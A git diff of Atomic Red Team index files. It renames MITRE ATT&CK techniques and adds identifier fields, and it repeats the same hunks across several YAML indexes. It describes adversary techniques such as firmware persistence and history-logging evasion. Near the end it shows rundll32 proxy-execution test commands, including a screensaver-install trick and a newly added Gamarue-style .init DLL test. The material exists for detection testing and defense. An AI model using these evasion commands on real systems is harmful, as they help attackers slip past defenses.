-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
@@ -86,7 +86,7 @@
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -8017,7 +8018,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -24527,6 +24528,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26704,7 +26706,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26779,6 +26781,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -30176,7 +30179,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -30228,6 +30231,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -35900,6 +35904,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -37510,7 +37515,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -37532,6 +37537,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7992,7 +7993,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -24243,6 +24244,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26567,7 +26569,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26642,6 +26644,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29916,7 +29919,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29968,6 +29971,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -35175,6 +35179,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36785,7 +36790,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36807,6 +36812,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -23952,6 +23953,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26129,7 +26131,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26204,6 +26206,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29478,7 +29481,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29530,6 +29533,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -34795,6 +34799,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36405,7 +36410,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36427,6 +36432,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -23836,6 +23837,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26013,7 +26015,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26088,6 +26090,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29362,7 +29365,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29414,6 +29417,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -34621,6 +34625,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36231,7 +36236,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36253,6 +36258,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -24207,6 +24208,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26384,7 +26386,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26459,6 +26461,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29733,7 +29736,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29785,6 +29788,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -35094,6 +35098,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36704,7 +36709,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36726,6 +36731,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -24231,6 +24232,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26408,7 +26410,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26483,6 +26485,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29757,7 +29760,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29809,6 +29812,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -35252,6 +35256,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36862,7 +36867,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36884,6 +36889,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -24185,6 +24186,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26362,7 +26364,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26437,6 +26439,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29711,7 +29714,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29763,6 +29766,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -35161,6 +35165,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36771,7 +36776,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36793,6 +36798,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -684,6 +684,35 @@ defense-evasion:
          copy #{exe_to_launch} not_an_scr.scr
          rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
        cleanup_command: del not_an_scr.scr
+    - name: Running DLL with .init extension and function
+      auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+      description: |
+        This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
